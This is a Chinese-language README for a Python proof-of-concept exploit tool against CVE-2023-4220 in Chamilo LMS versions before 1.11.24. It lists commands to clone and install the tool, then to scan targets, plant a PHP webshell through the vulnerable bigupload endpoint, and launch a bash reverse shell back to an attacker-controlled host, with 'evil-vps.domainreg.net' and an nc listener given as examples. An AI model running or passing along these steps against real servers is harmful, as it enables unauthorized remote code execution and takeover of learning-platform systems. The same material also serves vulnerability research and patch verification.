
这是一个用Python编写的脚本,用于利用CVE-2023-4220中描述的Chamilo LMS软件安全漏洞。
这是一个用 Python 编写的脚本,允许利用 CVE-2023-4220 描述的 Chamilo LMS 软件安全漏洞。该系统的版本在 1.11.24 之前受此漏洞影响。
将仓库克隆到本地并安装依赖(建议使用 virtualenv 创建隔离环境,以避免与全局安装冲突):
git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
cd chamilo-lms-unauthenticated-big-upload-rce-poc
pip install -r requirements.txt
该脚本需要提供 目标 URL,其中包含 Chamilo 的根路径(例如 http://example.com/chamilo**、**http://example.com 或 http://chamilo.example.com**)以及要执行的操作(共有三种操作:**scan**、**webshell 和 revshell)。
此操作将通过尝试访问 /main/inc/lib/javascript/bigupload/files/ 端点来检查目标是否易受攻击。
python3 main.py -u http://example.com/chamilo -a scan

此操作将在易受攻击的端点创建一个 PHP webshell 文件。
python3 main.py -u http://example.com/chamilo -a webshell

此操作将创建并执行一个 bash 反向 shell 文件。为此,首先会使用与上一操作相同的方法创建一个 webshell。之后,将执行一些命令以创建并执行 bash 文件。请确保在您使用 nc 或其他工具定义的端口上处于监听状态,以便实际收到反向连接。另外,主机可以是有效的 内部/公共 IPv4(例如 172.17.1.4 或 186.227.4.31)或您注册的域名(例如 evil-vps.domainreg.net)
python3 main.py -u http://example.com/chamilo -a revshell

备注: 很快我将添加一个针对 Windows 主机的 Windows 载荷选项。